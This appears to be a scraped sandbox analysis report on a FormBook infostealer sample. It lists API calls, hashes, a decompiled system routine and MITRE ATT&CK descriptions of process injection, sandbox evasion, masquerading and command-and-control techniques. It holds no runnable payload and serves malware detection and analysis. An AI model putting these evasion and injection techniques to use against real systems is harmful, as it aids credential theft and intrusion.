Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: ed660a03a7b054c888c3ee0d268581186a8827f2ae719e1c0308cdc0528e0666
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 64E01AB12002046BDB14EF59DC48EE777ACAF88650F018555BA0857241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 01027260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010272BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 010272DB

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction ID: c03e00ae2aa561d4658a29dc8af2321b1018c9c4cf397b0ca18bbdc0ac168a26
Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
Instruction Fuzzy Hash: 6001F231A802397AEB21B6949C02FFE776C9B51B50F140058FF44BA1C1E6A4690A82F5

Uniqueness

Uniqueness Score: -1.00%

Function 01027233, Relevance: 3.0, APIs: 2, Instructions: 32threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 010272BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 010272DB

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 57ed036d27a790d15c65f852f0757183d0687ba63c9901602f68075b09daad54
Instruction ID: 7e19cc22389c621766d78c9093e78f10af5d7f30ca1ac5e3427aa1192b15c2a3
Opcode Fuzzy Hash: 57ed036d27a790d15c65f852f0757183d0687ba63c9901602f68075b09daad54
Instruction Fuzzy Hash: 63E0D831B8023431E62115955C02FFE735C9B52F11F24005AFF44F91C0E5D4590902F1

Uniqueness

Uniqueness Score: -1.00%

Function 01029B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 01029B82

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 599813948377199bba42b9b9a2c38bad3517a3c505c009c241a01f4ee8a579b3
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: E8011EB5E4020EABDF10EAE4DD41FDDB7B89B54308F4041A5E94897241F671EB14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01038530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 01038584

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: bb189a10d9e00595edd0b07921b4bc9889bc4430ed905502f4183933294c9e2d
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 9101AFB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0102D3F7, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,01027C63,?), ref: 0102D42B

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a01f494f4a68f53e2c18f38698be6ae97e1b7cc0873f283dc97a4395d7de2769
Instruction ID: 7803d17312c30a0d2bf5348153a46278ea7ed6c055905e0c4826f0b13633390c
Opcode Fuzzy Hash: a01f494f4a68f53e2c18f38698be6ae97e1b7cc0873f283dc97a4395d7de2769
Instruction Fuzzy Hash: 55F02B31A5030827DB217BF49C49BEB77D8EF51714F0841D4F959D61C3DE60D98182A5

Uniqueness

Uniqueness Score: -1.00%

Function 01037000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,0102CCC0,?,?), ref: 0103703C

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 185e04aaa28da0e25bbc7138522af1bcfd1bae33f11158e1a0fde072e3332272
Instruction ID: 2e0e2a4cf7d46b189f669cb6d785018c369e25077082b451ffb2b111e92b733e
Opcode Fuzzy Hash: 185e04aaa28da0e25bbc7138522af1bcfd1bae33f11158e1a0fde072e3332272
Instruction Fuzzy Hash: 31E06D733802043AE23065A9AC02FE7B39C9BD1B61F54042AFB4DEA2C0D595F80142A4

Uniqueness

Uniqueness Score: -1.00%

Function 01038611, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0102CF92,0102CF92,?,00000000,?,?), ref: 01038650

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: f8f27de169bb355055db076b176f6fa82a1b4abebf6f639a0b48555e9833125c
Instruction ID: 4bb0a89ae6ae70f82aaa9a28c475c99768642ffe3209cb74e295a5b734a4ccb6
Opcode Fuzzy Hash: f8f27de169bb355055db076b176f6fa82a1b4abebf6f639a0b48555e9833125c
Instruction Fuzzy Hash: CDF039B1640204AFDB14DF65CC85EE77BA9EF89250F018569F94997681CA74A8118BF0

Uniqueness

Uniqueness Score: -1.00%

Function 01038480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(01033506,?,01033C7F,01033C7F,?,01033506,?,?,?,?,?,00000000,00000000,?), ref: 010384AD

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 8b5b43b1e5b41e389e38c1bafd9067fdb366d4086badc524877634232509c1d0
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: E7E012B1200208ABDB14EF99DC44EE777ACAF88650F118599BA085B241CA30F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 01038620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0102CF92,0102CF92,?,00000000,?,?), ref: 01038650

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 47f336dd6fba5b8dee2af2dba661cc99eb8871417f4595338afe2cb559316c97
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: F7E01AB12002086BDB10EF49DC84EE737ADAF88650F018155BA0857241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0102D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,01027C63,?), ref: 0102D42B

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 0eb2b5c07d941640ad27ee9b61fd2758767e6f496ea6828725db099b534b0930
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 3BD05E617903043BE610BAA89C06F6632CDAB54B00F494064FA88DA2C3D954E4004161

Uniqueness

Uniqueness Score: -1.00%

Function 01038446, Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(01033506,?,01033C7F,01033C7F,?,01033506,?,?,?,?,?,00000000,00000000,?), ref: 010384AD

Memory Dump Source

Source File: 00000008.00000002.498508989.0000000001020000.00000040.00000001.sdmp, Offset: 01020000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 39a4cce7c5354461c368d07cd146505b1d49da6115bb22df1dc6fc56588c3934
Instruction ID: 8a816851fd935d91d03545439f79aacca6af31c446cf6d4eb36b67afc86bc8e9
Opcode Fuzzy Hash: 39a4cce7c5354461c368d07cd146505b1d49da6115bb22df1dc6fc56588c3934
Instruction Fuzzy Hash: 33C08CB6214013498360EA84DC80876B31AEAC4230320874AA5DA4B1019639850B46A0

Uniqueness

Uniqueness Score: -1.00%

Function 038D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038D9694

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6898a3c3fdc72286094d0a98d69dde9572204c49c61f368af8d79590f3bc7bcf
Instruction ID: 53536405e78e75fa1158e136ae25d1b6072a821dfe34b98c685014443f067697
Opcode Fuzzy Hash: 6898a3c3fdc72286094d0a98d69dde9572204c49c61f368af8d79590f3bc7bcf
Instruction Fuzzy Hash: 87B09B719014D5C9D611D7F056087277A0477D1751F17C0D1D2024755A4778C499F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0392FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0392FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E038DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0392fdda
0x0392fde2
0x0392fde5
0x0392fdec
0x0392fdfa
0x0392fdff
0x0392fe0a
0x0392fe0f
0x0392fe17
0x0392fe1e
0x0392fe19
0x0392fe19
0x0392fe19
0x0392fe20
0x0392fe21
0x0392fe22
0x0392fe25
0x0392fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0392FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0392FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0392FE01

Memory Dump Source

Source File: 00000008.00000002.501216129.0000000003870000.00000040.00000001.sdmp, Offset: 03870000, based on PE: true

Associated: 00000008.00000002.501662803.000000000398B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.501673885.000000000398F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 958ac79d3b04f62666eb253cf4d774dc602806f09b670d70999da75574f44ce6
Instruction ID: 1fa67bb86d512c124d90fa4aaf3cd24ee89678703245edf0c300177354e5fb35
Opcode Fuzzy Hash: 958ac79d3b04f62666eb253cf4d774dc602806f09b670d70999da75574f44ce6
Instruction Fuzzy Hash: 32F0C876140A11BFDA215A89DC01E33BF6ADB45730F150654F624991D5D962A820D7A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report in.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004181AC, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041838A, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON